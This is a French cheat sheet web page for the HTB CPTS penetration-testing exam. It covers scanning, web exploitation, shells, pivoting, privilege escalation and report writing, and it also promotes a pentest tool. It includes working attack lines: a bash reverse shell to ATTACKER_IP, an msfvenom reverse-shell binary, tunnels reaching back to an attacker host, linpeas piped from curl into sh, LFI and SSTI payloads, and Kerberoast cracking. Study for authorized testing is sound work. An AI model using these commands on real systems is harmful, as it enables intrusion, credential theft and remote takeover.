Cheatsheet CPTS 2026

Les commandes et le workflow de l'examen HTB Certified Penetration Testing Specialist — information gathering, analyse de vulnérabilités, Active Directory, pivoting et le rapport commercial-grade qui te fait valider.

Mis à jour :

Navigation rapide

01 Information Gathering 02 Analyse de vulnérabilités 03 Exploitation Web 04 Shells & Payloads 05 Active Directory 06 Pivoting & Tunneling 07 Élévation de privilèges 08 Reporting 09 Conseils Examen

# Information Gathering

Le réseau CPTS est un environnement d'entreprise réaliste. Cartographie toute la surface externe et interne avant de toucher à quoi que ce soit — une énumération exhaustive pilote toute la chaîne d'attaque.

Scan de ports & services

nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt
Balayage TCP complet pour découvrir tous les services ouverts
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET
Scan scripté + détection de version sur les ports découverts

Sous-domaines & OSINT

subfinder -d TARGET -silent | httpx -silent -title -tech-detect
Découverte passive de sous-domaines + fingerprinting des hôtes vivants
curl -s 'https://crt.sh/?q=%.TARGET&output=json' | jq -r '.[].name_value' | sort -u
Certificate transparency — révèle des sous-domaines staging, dev, internes

Découverte de contenu web

ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -e .php,.aspx,.txt -mc all -fc 404
Fuzzing de répertoires / fichiers avec extensions
ffuf -u http://TARGET -H "Host: FUZZ.TARGET" -w subdomains.txt -fs 0
Découverte de virtual hosts (vhost) — fréquent sur les boxes web CPTS

Énumération SMB & domaine

netexec smb TARGET -u '' -p '' --shares
NetExec (successeur de CrackMapExec) — énumère les partages en session null
enum4linux-ng -A TARGET
Énumération SMB/RPC complète — utilisateurs, groupes, partages, politique de mots de passe

# Analyse de vulnérabilités

La CPTS attend une étape structurée d'analyse de vulnérabilités : associe chaque service à ses faiblesses connues avant d'exploiter, et documente tout pour le rapport.

💡 Astuce CPTS : note chaque finding avec sa sévérité et son CVSS au fil de l'eau — le rapport est noté, construis-le pendant l'évaluation, pas à la fin.
nuclei -u https://TARGET -t cves/ -t misconfiguration/ -severity medium,high,critical
Scan par templates des CVE connus et des misconfigurations
nikto -h http://TARGET -C all
Misconfigs serveur web et fichiers par défaut dangereux
searchsploit SERVICE VERSION
Associe un service+version fingerprinté à des exploits publics
curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-XXXX-XXXXX" | jq '.vulnerabilities[0].cve.metrics'
Récupère le vecteur CVSS officiel depuis NVD pour le citer dans le rapport

# Exploitation Web

Les applications web sont un foothold fréquent en CPTS. Injection, upload de fichiers, SSTI et inclusion ouvrent la porte du réseau interne.

Injection SQL

sqlmap -r request.txt --batch --level 5 --risk 3 --dbs
SQLi automatisée depuis une requête Burp — énumère les bases

Template Injection (SSTI)

{{7*7}} ${7*7} #{7*7}
Sondes SSTI — un 49 renvoyé = template injection côté serveur → souvent RCE

Inclusion de fichiers

curl "http://TARGET/?page=php://filter/convert.base64-encode/resource=config"
Wrapper PHP filter — lit le code source en base64 pour trouver des credentials

Bypass d'upload

cp shell.php shell.phar # essayer .phtml, .php5, double ext, magic bytes
Contourner les filtres d'extension pour déposer un web shell

# Shells & Payloads

Obtiens un foothold stable, puis passe à un shell interactif complet pour la phase interne.

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Reverse shell bash classique
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm
Upgrade en PTY, puis Ctrl+Z → stty raw -echo; fg pour un TTY complet
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o s.exe
Binaire reverse shell Windows x64

# Pivoting & Tunneling

Le réseau CPTS est segmenté. Tu compromettras un hôte dans un sous-réseau et pivoteras plus loin — ligolo-ng et chisel sont les outils de référence.

Ligolo-ng (recommandé)

./proxy -selfcert # sur Kali, puis : interface ip add 240.0.0.1/32 route
Démarre le proxy ligolo-ng et ajoute l'interface/route du tunnel
./agent -connect ATTACKER_IP:11601 -ignore-cert
Sur l'hôte compromis : se reconnecte pour atteindre son sous-réseau interne

Chisel & SSH

./chisel server -p 8080 --reverse # client : ./chisel client ATTACKER_IP:8080 R:socks
Proxy SOCKS5 inverse à travers un hôte compromis
proxychains4 netexec smb 10.10.0.0/24
Énumère le sous-réseau interne à travers le proxy SOCKS

# Élévation de privilèges

L'élévation locale sur les hôtes Linux et Windows réinjecte des credentials dans la compromission du domaine.

Linux

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
LinPEAS — met en avant les vecteurs de privesc ; vérifie chacun manuellement (GTFOBins)
sudo -l ; find / -perm -4000 -type f 2>/dev/null
Droits sudo + binaires SUID — les deux vecteurs Linux les plus courants

Windows

.\winPEASx64.exe ; whoami /priv
WinPEAS + privilèges du token — cherche SeImpersonatePrivilege
.\GodPotato.exe -cmd "cmd /c whoami"
SeImpersonate → SYSTEM sur les Windows modernes

# Reporting

La CPTS est notée sur un rapport commercial-grade — c'est là que se joue l'essentiel des points. Structure-le professionnellement et rends chaque finding reproductible.

💡 Astuce CPTS : HTB supporte officiellement SysReptor, et les rapports Markdown s'importent proprement. Chaque finding a besoin de : description, impact, hôtes affectés, vecteur CVSS v3.1, étapes de reproduction, remédiation et références.
# Résumé exécutif → Chaîne d'attaque → Findings (CVSS + étapes) → Synthèse de remédiation
Le squelette de rapport CPTS commercial-grade attendu par HTB
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt # documente les creds cassés
Note comment chaque credential a été obtenu — la reproductibilité est notée

# Conseils Examen CPTS

Stratégie pour les 10 jours d'examen plus le rapport. C'est sur le rapport que les candidats perdent le plus de points.

📝 Le rapport est noté, pas juste les flags : rédige les findings au fil de l'eau. Une compromission parfaite avec un rapport faible peut échouer.
🏰 Pense en chaînes d'attaque : la CPTS récompense le chaînage réaliste de petites misconfigs, pas les exploits isolés. Cartographie avec BloodHound.
🗺️ Maîtrise le pivoting : le réseau est segmenté — pratique ligolo-ng et proxychains jusqu'à l'automatisme.
⏱️ Utilise les 10 jours : contrairement à l'OSCP, tu as le temps. Énumère en profondeur, fais des pauses, garde des notes propres (horodatage + captures).
🔐 Apprends l'abus AD CS : ESC1–ESC8 (certipy) est un chemin rapide fréquent vers Domain Admin sur les AD modernes.

❓ Questions fréquentes CPTS

L'examen HTB CPTS est une évaluation 100% pratique de 10 jours sur un réseau Active Directory d'entreprise réaliste, suivie d'un temps pour rédiger un rapport commercial-grade. Il faut atteindre un nombre de flags requis ET remettre un rapport professionnel — le rapport est obligatoire et fortement pondéré.

Leur focus diffère. La CPTS a une composante Active Directory et de chaînage bien plus large et réaliste, et un fort accent sur le rapport professionnel ; l'OSCP inclut des machines indépendantes et une fenêtre plus courte de 23h45. Beaucoup considèrent la CPTS plus large et plus orientée entreprise ; l'OSCP reste la référence historique.

Oui. La CPTS est notée sur un rapport commercial-grade, pas seulement sur les flags. Il doit inclure un résumé exécutif, un narratif de chaîne d'attaque, et des findings avec sévérité, CVSS, hôtes affectés, étapes de reproduction et remédiation. HTB supporte officiellement SysReptor, et les outils Markdown s'importent proprement.

nmap, ffuf/feroxbuster, nuclei, BloodHound/SharpHound, impacket (GetUserSPNs, secretsdump, psexec), certipy (AD CS ESC1–ESC8), evil-winrm, NetExec/CrackMapExec, ligolo-ng ou chisel pour le pivoting, et hashcat. Reporting avec SysReptor ou le rapport IA de Pentest Mindmap.

Le job path « Penetration Tester » de HTB Academy fait environ 250+ heures et couvre tout le programme CPTS. La plupart des candidats ont besoin de 2 à 5 mois selon leur expérience, avec un fort focus sur Active Directory, le pivoting et le reporting.

Oui — massivement. Le réseau d'examen CPTS est un environnement AD d'entreprise. Maîtrise l'analyse de chemins BloodHound, le Kerberoasting, l'AS-REP roasting, l'abus AD CS (certipy ESC1–ESC8), le relais NTLM, le DCSync et le mouvement latéral jusqu'au Domain Admin.

Non. Contrairement à l'OSCP classique, la CPTS ne se concentre pas sur l'exploitation manuelle de buffer overflow. Elle met l'accent sur des chaînes d'attaque d'entreprise réalistes, l'exploitation web et Active Directory, le pivoting et le reporting professionnel.

ESC1 est une mauvaise configuration d'Active Directory Certificate Services où un template vulnérable autorise l'authentification client et laisse l'enrollee fournir le sujet. Avec certipy, tu peux demander un certificat au nom d'un Domain Admin et obtenir un TGT — un chemin rapide vers la compromission du domaine, fréquent sur les AD modernes testés en CPTS.

Résumé exécutif (non-technique), périmètre de la mission, un narratif de chaîne d'attaque réaliste, des findings détaillés (description, impact, hôtes affectés, vecteur CVSS v3.1, étapes de reproduction, remédiation, références) et une synthèse de remédiation priorisée. Reste commercial-grade et reproductible.

Oui — comme accélérateur de préparation. La mindmap gratuite organise 12 020+ commandes couvrant les domaines CPTS, l'Espace Pentest fournit un template de rapport CPTS dédié, et l'AI Wizard génère un rapport style CPTS commercial-grade. Il accélère l'apprentissage de la méthodologie — respecte toujours les règles de ton examen.

📚 Ressources liées

Rapport CPTS assisté par IA

Transforme tes findings en rapport CPTS commercial-grade. L'AI Wizard a un format CPTS dédié avec chaîne d'attaque et findings CVSS.

Essayer gratuitement →

Prépare ta CPTS avec 12 020+ commandes

Cette cheatsheet n'est que la surface. Pentest Mindmap organise 12 020+ commandes en 34 catégories avec recherche instantanée, un template de rapport CPTS et un générateur de rapport IA.

Commencer gratuitement →
📎 Cette cheatsheet t'a été utile ?